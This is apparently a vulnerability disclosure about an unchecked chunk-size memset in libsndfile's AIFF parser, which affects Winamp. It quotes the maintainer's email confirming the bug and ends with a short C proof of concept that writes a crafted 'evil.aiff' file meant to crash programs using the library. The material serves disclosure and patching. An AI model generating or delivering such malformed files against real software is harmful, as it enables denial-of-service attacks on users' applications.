http://www.mega-nerd.com/libsndfile/

	if (comm_fmt->size > 0x10000 && (comm_fmt->size & 0xffff) == 0)
	{	psf_log_printf (psf, " COMM : %d (0x%x) *** should be ", comm_fmt->size, comm_fmt->size) ;
		comm_fmt->size = ENDSWAP_INT (comm_fmt->size) ;
		psf_log_printf (psf, "%d (0x%x)\n", comm_fmt->size, comm_fmt->size) ;
		}
	else
		psf_log_printf (psf, " COMM : %d\n", comm_fmt->size) ;
 

fecha 25 de enero de 2009 4:06
asunto Re: libsndfile AIFF buffer unverified

Anon wrote:

> Testing and debugging winamp, About (bugtraq ID: 33226), I have verified that
> the bug is specific to the library libsndfile. I saw that some of the functions
> of reading gives AIFF file headers, this does not check the limits of
> (CommonChunk.ckSize). There may be other functions with the same problem.
> One of the errors occur when unverified memset is called the limit of memory.
>
> Quote segment code at src/aiff.c: 847
>
> ============================================================
>       else if (comm_fmt->size >= SIZEOF_AIFC_COMM)
>         {
>       //Some lines omitted
>
>       memset (psf-> u.scbuf, 0, comm_fmt-> size);
> ============================================================

I agree that is an issue and it was fixed some time hago in the development
version.

> Denial of Service to any programsthat run the library.

Yes, it could result in a program crash

Erik

#include<stdio.h>
#include<stdlib.h>
#define AIFFSIZE 81
 
char *aiffbuff ="\x46\x4f\x52\x4d\x00\x04\xcd\xec\x41\x49\x46\x46\x43\x4f\x4d\x4d\x41\x41\x41\x41"
				"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
				"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
				"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x20\x5e\x01\x18\x0f\x3c\x0e\xe4"
				"\x00";
int main(void)  {
	FILE *aiff = fopen("evil.aiff","w+");
	fwrite(aiffbuff,AIFFSIZE,1,aiff);
	fclose(aiff);
}